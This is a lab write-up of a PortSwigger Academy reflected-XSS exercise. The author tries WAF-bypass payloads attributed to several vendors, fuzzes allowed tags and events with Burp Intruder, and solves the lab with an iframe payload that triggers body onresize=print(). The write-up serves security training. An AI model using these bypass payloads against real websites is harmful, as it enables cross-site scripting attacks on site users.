PortSwigger Academy Lab: Reflected XSS into HTML context with most tags and attributes blocked

Jun Takemura · March 14, 2025

Task

This lab contains a reflected XSS vulnerability in the search functionality but uses a web application firewall (WAF) to protect against common XSS vectors.

To solve the lab, perform a cross-site scripting attack that bypasses the WAF and calls the print() function.

Note

Your solution must not require any user interaction. Manually causing print() to be called in your own browser will not solve the lab.

Attempt

So this is a reflexted xss lab but it shoudn’t require any user interaction? Okay the lab has the exploit server. I should use this.

First, put this into the search function:

<><img src=# onerror=print()>

Got tag is not allowed message.

I didn’t have a clue about the WAF they used so I just tried common WAF bypasses.

cloudflare

<svg/onrandom=random onload=print()>
<video onnull=null onmouseover=print()>

no

Akamai:

<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

no

wordfence:

<a href=javas&#99;ript:alert(1)>

no

fortiweb:

\u003e\u003c\u0068\u0031 onload=print()\u003e

This passed but the function didn’t work.

I can’t keep doing this so let’s use burp’s intruder. From burp xss cheat sheet, I copied all the tags and pasted into intruder.

Select the position between <> and started fuzzing.

GET /?search=<§§> HTTP/2

I found out body is allowed.

Next, fuzzed events:

GET /?search=<body%20§§=print()> HTTP/2

List of allowed tags:

|0||200|307|false|false|3489||
|10|onbeforeinput|200|358|false|false|3502||
|13|onbeforetoggle|200|385|false|false|3503||
|17|oncancel|200|304|false|false|3497||
|23|oncontentvisibilityautostatechange|200|321|false|false|3523||
|24|oncontentvisibilityautostatechange(hidden)|200|383|false|false|3531||
|33|ondragexit|200|395|false|false|3499||
|46|onformdata|200|352|false|false|3499||
|74|onpointercancel|200|362|false|false|3504||
|85|onratechange|200|406|false|false|3501||
|88|onresize|200|329|false|false|3497||
|90|onscrollend|200|359|false|false|3500||
|91|onscrollsnapchange|200|371|false|false|3507||
|100|onsuspend|200|394|false|false|3498||
|119|onwebkitfullscreenchange|200|320|false|false|3513||
|120|onwebkitmouseforcechanged|200|312|false|false|3514||
|121|onwebkitmouseforcedown|200|286|false|false|3511||
|122|onwebkitmouseforceup|200|306|false|false|3509||
|123|onwebkitmouseforcewillbegin|200|299|false|false|3516||

I first tried onwebkitfullscreenchange but it seemed modern browsers prohibit an automatic full screen request. So I chose onresize.

Set this at the exploit server:

<iframe src="https://0a94001004ef162c802adf6300cd000b.web-security-academy.net/?search=%3Cbody%20onresize%3Dprint()%3E" onload=this.style.width='500px'>

Delivered this to the victim and successfully solved the lab.

Twitter, Facebook